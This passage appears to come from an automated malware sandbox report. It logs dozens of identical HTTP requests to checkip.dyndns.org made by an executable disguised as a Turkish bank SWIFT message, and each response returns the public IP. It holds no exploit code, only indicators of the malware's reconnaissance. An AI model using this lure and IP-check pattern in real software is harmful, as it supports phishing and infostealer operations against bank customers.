                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:41:02.212490082 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 5e192161e6d397f20ae4e7b10a6ed94e
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.550053193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:03.877058983 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:05.167371035 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 3e00e5640e48b6451491cd9674ababf9
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.550055193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:07.149638891 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:08.416218996 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:08 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e4dfc3f43fe35aa107faa2f45f916173
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.550057193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:10.066623926 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:11.371253967 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 5bba5f668e03eaa814c9f00ffcb41e22
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.550059193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:13.134402990 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:14.400928020 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 444b3beac73e5d8aba95b101baf496cd
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.550061193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:16.490940094 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:41:17.788548946 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: bc988818157699706d72bb4bfc789da1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.550063193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:19.415219069 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:20.721466064 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:20 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 6af3b88d535669034564524f7424565a
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.550065193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:22.337064028 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:23.607122898 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b26283283a51d1afaf54db2a3d386917
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.550067193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:25.418948889 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:26.707092047 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 61b854d8c79490d5704090c75ca5321e
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        44192.168.2.550069193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:28.401623964 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:41:29.672833920 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: c47aa67d8b3b03a29dbe7314c5344748
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        45192.168.2.550071193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:31.328754902 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:32.617191076 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 5c9119d0d36f1b4dc49f6354e23a5230
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        46192.168.2.550074193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:36.268332958 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:37.549618006 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:37 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a411d43a7edfccdbeec9cd605a1d7bb6
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        47192.168.2.550077193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:41.051714897 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:42.319103956 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:42 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 90b5fef6d4d08ca14f1c1c810dedfa10
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        48192.168.2.550080193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:46.012015104 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:47.279660940 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e30b2d4a4bb3166a85b71b1dbefbe560
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        49192.168.2.550083193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:50.916521072 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:52.184236050 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:51 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 29e039a0be4b882ee9c20088b2687375
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        50192.168.2.550086193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:56.038722992 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:41:57.355071068 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:41:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 06ec2a399b68a8b34eb4963723a13775
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        51192.168.2.550089193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:00.851011992 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:02.120084047 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f69f7711dddda032041b0b570f49f0bd
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        52192.168.2.550092193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:05.823609114 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:07.155023098 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:06 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d9e07d19d903d41e0d013c54e3c1bdb3
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        53192.168.2.550095193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:10.819938898 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:42:12.090312004 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 0b15fb1d6d45d895e6e93674f412a2df
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        54192.168.2.550098193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:15.806082010 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:42:17.084002972 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:42:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4c9ef212fccefbb315bf4a7e0b660cc8
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        55192.168.2.550101193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:42:20.643524885 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
